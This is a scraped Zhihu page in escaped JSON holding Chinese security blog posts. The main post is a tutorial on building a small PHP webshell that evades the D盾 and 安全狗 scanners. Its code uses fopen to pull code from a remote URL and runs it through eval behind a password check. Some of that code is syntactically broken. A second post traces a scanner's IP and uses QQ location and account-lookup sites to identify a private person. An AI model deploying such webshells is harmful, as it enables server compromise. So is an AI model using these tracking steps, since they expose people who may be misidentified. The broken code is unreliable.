003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E报名入圈请点击链接完成基础信息认证【非常重要】,我们等待您的加入!\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Ca href=\&https:\u002F\u002Fwww.wjx.top\u002Fjq\u002F.aspx\&\u003E“i春秋城市白帽北京圈”入群必填信息。\u003C\u002Fa\u003E\u003C\u002Fp\u003E&,&updated&:new Date(&T06:33:06.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:6,&likeCount&:8,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T14:33:06+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-d2feacb98aa_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:6,&likesCount&:8},&&:{&title&:&打造一款1kb大马并且处理D盾以及安全狗拦截与查杀&,&author&:&yin-chang-ni&,&content&:&\u003Cblockquote\u003E\u003Cb\u003E前言:\u003C\u002Fb\u003E在之前sky666提到了关于大马被waf拦的问题,我决定手动去过一下bypass。可是发现怎么也过不去查杀,更别说拦截了。对此无奈,只好花了个通宵去处理一下。顺便一提,理论过所有Waf,并且被杀只需要稍微处理一下依旧可用。\u003C\u002Fblockquote\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003EPrat 1 目录\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cblockquote\u003E一:base64编码,处理eval函数进行绕过(失败)\u003Cbr\u003E二:巧妙利用fopen函数绕过waf\u003Cbr\u003E三:fopen函数处理eval拦截问题\u003Cbr\u003E四:对此次一次总结\u003C\u002Fblockquote\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003EPrat 2 \u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E起源base64编码,处理eval函数进行绕过(失败)\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E之前一份大马中,发现进行base64编码过后,查杀的是已知后门,而不是查杀某个函数,于是决定开端先处理一下eval看看能不能进行绕过。\u003C\u002Fp\u003E\u003Cimg src=\&v2-dcde559f9a6e29.jpg\& data-caption=\&\& data-rawwidth=\&1362\& data-rawheight=\&695\&\u003E\u003Cp\u003E\u003Cb\u003Eeval直接执行base64解码\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E可以成功执行,但是被D盾报4级,这样肯定是不行的,\u003C\u002Fp\u003E\u003Cimg src=\&v2-81fad9b29c878b29f9c226d52af0faf8.jpg\& data-caption=\&\& data-rawwidth=\&1299\& data-rawheight=\&563\&\u003E\u003Cp\u003E\u003Cb\u003Ebase64编码思路宣告失败\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E发现D盾似乎对base64_decode()函数独有情钟- -#\u003C\u002Fp\u003E\u003Cp\u003E不管怎么处理只能处理到二级,安全狗倒是已经过去了\u003C\u002Fp\u003E\u003Cimg src=\&v2-5c1dbb398a4aebb06eba1e.jpg\& data-caption=\&\& data-rawwidth=\&1361\& data-rawheight=\&744\&\u003E\u003Ccode lang=\&text\&\u003E&?php\n$a = &#x27;base64编码过后&#x27;;\n$c = base64_decode($a);\neval($d = $c);\n?&\u003C\u002Fcode\u003E\u003Cimg src=\&v2-9cccaeaf8feeff315ff461.jpg\& data-caption=\&\& data-rawwidth=\&1025\& data-rawheight=\&622\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003EPrat 3\u003C\u002Fb\u003E \u003Cb\u003E失落\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E巧妙利用fopen函数绕过waf\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E发现base64思路惨败D盾过后,抽了支烟,说了一句D盾你个禽兽\u003C\u002Fp\u003E\u003Cp\u003E不过失败是成功他亲爹,只好继续想新思路。\u003C\u002Fp\u003E\u003Cp\u003E之前写过一篇水文,叫做\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003E隐藏在黑页下的大马\u003C\u002Fa\u003E\u003C\u002Fu\u003E.\u003C\u002Fp\u003E\u003Cp\u003E不过被挺多人喷的,其实这篇文章只是另外一种思路的铺垫,不过因为没人支持,也就没有写下去了。\u003C\u002Fp\u003E\u003Cp\u003E这篇文章中用了php_curl函数,不过利用门槛比较高,于是查了一下等价函数。\u003C\u002Fp\u003E\u003Cp\u003E首先我们来看一下fopen函数\u003C\u002Fp\u003E\u003Cp\u003E\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003Efopen()\u003C\u002Fa\u003E\u003C\u002Fu\u003E \u002F\u002Ffopen()函数打开文件或者 URL。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E思路\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E通过fopen打开远程url的txt文件存入一个变量中,在执行。\u003C\u002Fp\u003E\u003Cp\u003E说干就干,首先把一份大马去掉\u003Cb\u003E&?\u003C\u002Fb\u003E以及\u003Cb\u003E?&\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E然后存入一个txt中,确保打开的时候能打开。\u003C\u002Fp\u003E\u003Cp\u003E可能这里就有人问了,txt放哪里?\u003C\u002Fp\u003E\u003Cp\u003E这里我只想说,心里没点B数?\u003C\u002Fp\u003E\u003Cp\u003E大马地址:\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003Ehttp:\u002F\u002F127.0.0.1\u002Fbh\u002Ftest.txt\u003C\u002Fa\u003E\u003C\u002Fu\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E举个例子:\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003E&?php \n$handle1 = fopen(&#x27;http:\u002F\u002F127.0.0.1\u002Fbh\u002Ftest.txt&#x27;, &#x27;r&#x27;);\n$content1 = &#x27;&#x27;;\n
while(false != ($a1 = fread($handle1, 8080))){\n
$content1 .= $a1;\n
echo $content1;\n
fclose($handle1);\n?&\u003C\u002Fcode\u003E\u003Cimg src=\&v2-f8cc0f1a7a692dcbf582a0db631c4b3b.jpg\& data-caption=\&\& data-rawwidth=\&1025\& data-rawheight=\&622\&\u003E\u003Cp\u003E发现已经获取成功了,那么我们只需要eval执行一下就可以了\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003E&?php \n$handle1 = fopen(&#x27;http:\u002F\u002F127.0.0.1\u002Fbh\u002Ftest.txt&#x27;, &#x27;r&#x27;);\n$content1 = &#x27;&#x27;;\n
while(false != ($a1 = fread($handle1, 8080))){\n
$content1 .= $a1;\n
eval($content1);\n
fclose($handle1);\n?&\u003C\u002Fcode\u003E\u003Cimg src=\&v2-7fe337341c.jpg\& data-caption=\&\& data-rawwidth=\&1025\& data-rawheight=\&622\&\u003E\u003Cp\u003E首先看一下安全狗是否拦截\u003C\u002Fp\u003E\u003Cp\u003E大马地址:\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003Ehttp:\u002F\u002F192.168.1.110\u002Fbh\u002Ftest.txt\u003C\u002Fa\u003E\u003C\u002Fu\u003E\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003Ewebshell地址:192.168.1.104\u002Ftest\u002Fphp.php\u003C\u002Fcode\u003E\u003Cimg src=\&v2-c5ec51cec8d.jpg\& data-caption=\&\& data-rawwidth=\&1361\& data-rawheight=\&744\&\u003E\u003Cp\u003Eok,可以看见安全狗以及绕过了,并且可以正常使用。\u003C\u002Fp\u003E\u003Cp\u003E补一张没做过处理大马访问图:\u003C\u002Fp\u003E\u003Cimg src=\&v2-e6d12efb16ef2db99ae0a.jpg\& data-caption=\&\& data-rawwidth=\&1361\& data-rawheight=\&744\&\u003E\u003Cp\u003E不过问题来了,D盾报一级拦截,我顿时想说mmp。\u003C\u002Fp\u003E\u003Cimg src=\&v2-50ec5fc9de8d848b9dbf.jpg\& data-caption=\&\& data-rawwidth=\&1266\& data-rawheight=\&426\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E之前处理一句话的时候,也是经常报我一级- -#\u003C\u002Fp\u003E\u003Cp\u003E继续抽了支烟,然后继续处理这个错误\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003EPrat 4 希望\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003Efopen函数处理eval拦截问题\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E这里没什么思路完全是因为bypass小分队的大佬帮我处理的。\u003C\u002Fp\u003E\u003Cimg src=\&v2-1c8a18fec6a1eb0cc96ddef7ebb1beca.jpg\& data-caption=\&\& data-rawwidth=\&1366\& data-rawheight=\&736\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E贴一下最后成品代码\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003E&?php\nerror_reporting(E_ERROR);\nif(isset(isset($_GET[&#x27;submit&#x27;]) && $_GET[&#x27;pass&#x27;] == \&admin\&){\n
if($_POST[$_GET[&#x27;test&#x27;] == \&test\&){\n
$handle1 = fopen(&#x27;http:\u002F\u002F127.0.0.1\u002Fbh\u002Ftest2.txt&#x27;, &#x27;r&#x27;);\n
$content1 = &#x27;&#x27;;\n
while(false != ($a1 = fread($handle1, 8080))){\n
$content1 .= $a1;\n
print(eval($a1=$content1));\n
fclose($handle1);\n
$handle = fopen(&#x27;http:\u002F\u002F127.0.0.1\u002Fbh\u002Ftest.txt&#x27;, &#x27;r&#x27;);\n
$content = &#x27;&#x27;;\n
while(false != ($a = fread($handle, 8080))){\n
$content .= $a;\n
print(eval($a=$content));\nfclose($handle);\n}\n?&\u003C\u002Fcode\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E一句话地址:\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003Ehttp:\u002F\u002F127.0.0.1\u002Fbh\u002Ftest2.txt\u003C\u002Fa\u003E\u003C\u002Fu\u003E\u003C\u002Fp\u003E\u003Cp\u003Ewebshell地址:\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003Ehttp:\u002F\u002F127.0.0.1\u002Fbh\u002Ftest.txt\u003C\u002Fa\u003E\u003C\u002Fu\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-8af63d3fe4c4.jpg\& data-caption=\&\& data-rawwidth=\&1025\& data-rawheight=\&622\&\u003E\u003Cp\u003E说一下代码\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003Eif(isset($_GET[&#x27;submit&#x27;]) && $_GET[&#x27;pass&#x27;] == \&admin\&)\u003C\u002Fcode\u003E\u003Cp\u003E这一部分是验证部分,但是懒得写好看的登陆口,直接获取了下GET传值做判断,为了防爆破多写了一个。\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003Eif($_POST[$_GET[&#x27;test&#x27;] == \&test\&)\u003C\u002Fcode\u003E\u003Cp\u003E这一部分是用来进入一句话的,当然你也可以删掉\u003C\u002Fp\u003E\u003Cp\u003E再来说说处理eval一级,其实很简单,我也是\u003Cb\u003Ebypass小分队\u003C\u002Fb\u003E的\u003Cb\u003E老司机\u003C\u002Fb\u003E说了才知道的~~~\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003Eeval($a1=$content1);\u003C\u002Fcode\u003E\u003Cp\u003E看这一行代码,相信大家就已经知道了。\u003Cb\u003E:-) :-) :-)\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003EPrat 5 总结\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E前人失效的思路不代表着没有继续扩展的意义。\u003C\u002Fp\u003E\u003Cp\u003E多想多做多实战,发现其实waf也就那回事。\u003C\u002Fp\u003E\u003Cp\u003E无非就是在原有的基础上加了几行代码。\u003C\u002Fp\u003E&,&updated&:new Date(&T09:26:35.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:1,&likeCount&:32,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T17:26:35+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-bb7e21fce8f4aa8fa6c6c84_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:1,&likesCount&:32},&&:{&title&:&反击黑客之对网站攻击者的IP追踪&,&author&:&yin-chang-ni&,&content&:&\u003Cblockquote\u003E作者:rosectow\u003Cbr\u003E来源:\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003Ei春秋社区\u003C\u002Fa\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E\u003Cb\u003E前言\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003Eip追踪是一件比较难实现的,因为我只有一个ip,而且在没有任何技术支持下对该ip追踪,同时我在公司也没有服务器权限,仅有后台,一般的ip追踪技术分类,反应式ip追踪,主动式的追踪,分享的只是一个过程,提供一个思路我不敢保证每个人都能这样成功利用,\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E早晨起床上班像往常一样,打开电脑,吃一份早餐,看看i春秋学习技术,在打开公司的网站做一份数据统计,但是今天打开网站的cnzz统计时不向往常那样了,发现显示在今天来路域名中有一个网站看着很熟悉,仔细看清楚这个不是awvs的扫描地址吗?\u003C\u002Fp\u003E\u003Cimg src=\&v2-1c46bd77f494bddb3febdae4d266e8cc.jpg\& data-caption=\&\& data-rawwidth=\&424\& data-rawheight=\&41\&\u003E\u003Cp\u003E\u003Cb\u003E0x01\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E很疑问难道有黑客要来黑网站,发现单独一个ip对网站的访问次数是64次,wvs帮他扫描了64,不过这个次数数据有可能不准确,突然想起了在Freebuf里面看过大牛写过“论如何反击用AWVS的黑客”内容相当精彩,但是我这一次是要对这扫描者进行追踪,freebuf那边那篇是故意让黑客来访问他的攻击页面,所以利用不上,不过也是学习了,想看看是谁想要来攻击网站,因为网站多次给扫描了,这不是第一次了,所以不能每次只做防御,也要让这个黑客收手吧!\u003C\u002Fp\u003E\u003Cp\u003ECnzz里面有许多的信息可以寻找,而且我们网站也有记录一些信息,今天早上网站的访问量不是很多,找起来也就方便许多,uv 1000个 ip 900多个差不多这样,根据流量趋势中发现了在9点到10点这段时间uv 跟ip 90多个但是PV是800多,分析出这段时间是黑客对网站进行扫描的时间\u003C\u002Fp\u003E\u003Cimg src=\&v2-23c477aea8a99ce631028.jpg\& data-caption=\&\& data-rawwidth=\&364\& data-rawheight=\&229\&\u003E\u003Cp\u003E于是我在明细中,找到了一个可疑的ip,这个ip在这个9-10的时间段,这个ip访问了两百多次,但是仔细看了一下另外这个访问两百多次的ip是我们公司的ip,事实证明了这个不是攻击者的ip,其中还有一个ip在网站点击了100多次,平均是1秒点击3个页面,跳出率是百分之百根据分析是wvs在进行扫描,这个ip就是攻击者的ip。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E想到这个ip可能是代理ip可能不是黑客的真实ip,因为公司网站中添加了一些“获取客户端”真实ip防止黑客使用代理访问\u003C\u002Fp\u003E\u003Cp\u003E参考\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003Ehttps:\u002F\u002Fmy.oschina.net\u002Fgeekice\u002Fblog\u002F3C\u002Fa\u003E\u003C\u002Fu\u003E nginx反向代理httpd获取用户真实ip\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E0x02\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E公司的网站是jsp这里我就贴上Java的获取真实ip的后端代码,下面了解一下这些代码\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003Epublic String getClientIP(HttpServletRequest request) {\nString ip = request.getHeader(\&x-forwarded-for\&);\nif(ip == null || ip.length() == 0 || \&unknown\&.equalsIgnoreCase(ip)) {\nip = request.getHeader(\&Proxy-Client-IP\&);\n}\nif(ip == null || ip.length() == 0 || \&unknown\&.equalsIgnoreCase(ip)) {\nip = request.getHeader(\&WL-Proxy-Client-IP\&);\n
\n}\nif(ip == null || ip.length() == 0 || \&unknown\&.equalsIgnoreCase(ip)) {\nip = request.getRemoteAddr();\n}\\n}\n\u003C\u002Fcode\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003Epublic String getClientIP (HttpServletRequest request)\u003C\u002Fcode\u003E\u003Cp\u003E得到用户的公网(代理)ip 然后在对用户发起一次http请求\u003C\u002Fp\u003E\u003Ccode lang=\&text\&\u003EString ip = request.getHeader(\&x-forwarded-for\&);\u003C\u002Fcode\u003E\u003Cp\u003E请求获取x-forwarded-for ,x-forwarded-for就是请求获取http访问的真实ip\u003C\u002Fp\u003E\u003Cp\u003E大致的过程也就是这样来获取,下面的代码是判断ip之类的,这个Java的代码目的也是获取http访问的真实ip,下面的就不做解释了,理解他的主要功能就行\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E如果想深入了解的可以看看,下面这篇文章,写的很经常,也是写nginx 反向的一些东西\u003C\u002Fp\u003E\u003Cp\u003E\u003Cu\u003E\u003Ca href=\&http:\u002F\u002Fwww.cnblogs.com\u002Fzhengyun_ustc\u002Farchive\u002F\u002F19\u002Fgetremoteaddr.html\&\u003Ehttp:\u002F\u002Fwww.cnblogs.com\u002Fzhengyun_ustc\u002Farchive\u002F\u002F19\u002Fgetremoteaddr.html\u003C\u002Fa\u003E\u003C\u002Fu\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-ac8f5fb7f301c608f1a8c8924afb409b.jpg\& data-caption=\&\& data-rawwidth=\&940\& data-rawheight=\&141\&\u003E\u003Cp\u003E\u003Cb\u003E0x03\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E前面确认攻击者是哪个ip,但是为了保障ip正确我在公司的一些记录里找到了有这个ip来访,那么已经得到了一定的保障这个ip是对的,发现了这个ip来自xx省xx市,那么得到了ip之后接下来是要对这个ip进行定位,在找到这个攻击者的联系方式,我利用了某站的定位测试了一下\u003C\u002Fp\u003E\u003Cimg src=\&v2-2cad583626dde2d82abc6d.jpg\& data-caption=\&\& data-rawwidth=\&321\& data-rawheight=\&214\&\u003E\u003Cp\u003E定位测试在这一块区域2774米内,为了确保定位测试正确,我使用其他接口再一次定位这个ip,以及用谷歌硬件查询他的经纬度地址,他的ip就在2774米内是最准确的数据\u003C\u002Fp\u003E\u003Cimg src=\&v2-85fa5a20c82a7302de0add.jpg\& data-caption=\&\& data-rawwidth=\&376\& data-rawheight=\&202\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cimg src=\&v2-2aeb866bbefee2dee23a.jpg\& data-caption=\&\& data-rawwidth=\&936\& data-rawheight=\&654\&\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E0x04\u003C\u002Fp\u003E\u003Cp\u003E接下来我要在这块区域找到这个黑客的联系方式,我们每个人必用的社交软件有qq,微信 差不多就这两个是在手机电脑里的,其他的应该比较少,我之前写过一篇,(定位日站大法-之\u003Cu\u003E\u003Ca href=\&http:\u002F\u002Fwww.ichunqiu.com\u002F#profession\&\u003E社会工程学\u003C\u002Fa\u003E\u003C\u002Fu\u003E)也发在i春秋社区里面,因为这篇文章写的内容也是有一处相关的,这里我也就利用到这篇文章其中一张图片,为了不泄露测试的目标就用一下,使用到的是qq的漫游定位功能,有些人说qq没法定位,因为qq高版本的好像没有了qq漫游定位这个功能,所以先下载16年的版本测试吧。\u003C\u002Fp\u003E\u003Cimg src=\&v2-5bdafbc5e9e4aaa21fe32a23b6cee6f9.jpg\& data-caption=\&\& data-rawwidth=\&351\& data-rawheight=\&481\&\u003E\u003Cp\u003E因为这里我在2000多米的范围内进行定位然后在找到附近的人,然后还要进一步了解,这肯定是要消耗大量时间的,而且需要运气的,因为我是找到的每一个都放入\u003Cu\u003E\u003Ca href=\&https:\u002F\u002Fbbs.ichunqiu.com\u002Fthread-.html?from=zh\&\u003Ehttp:\u002F\u002Fwww.zhaohuini.com\u002F\u003C\u002Fa\u003E\u003C\u002Fu\u003E 查找注册过的网站,以及百度搜索这些qq的信息,看看有没有什么重要的确认点没,经过一番查找,查找到了一个qq曾经注册过许多安全类型的论坛,和idc网站\u003C\u002Fp\u003E\u003Cimg src=\&v2-fdf8e8dbf0e1ee29bd74e2e.jpg\& data-caption=\&\& data-rawwidth=\&985\& data-rawheight=\&672\&\u003E\u003Cp\u003E\u003Cb\u003E0x05\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E添加了该qq,对他的空间访问,查看看见了许多挂其他网站的黑连接,黑页之类的,感觉应该是这个人,但是这个人没有发布我们公司网站的记录,因为我们公司的网站是存反射性xss的可能是黑客没有发现漏洞吧!但是wvs扫描器应该会找到这个漏洞的,判断过程中不敢明确是这个人对我们网站扫描,因为我在经纬度定位中定位到了找到了一个这样的人是非常可疑但是“也有可能不是”这个人。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E先发出来,因为定位到那边这个qq是在一个中学附近定位到的所以那个中学说不定他们这两个人是同学,暂时不敢确认是这个人}

我要回帖

更多关于 安智登录器 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信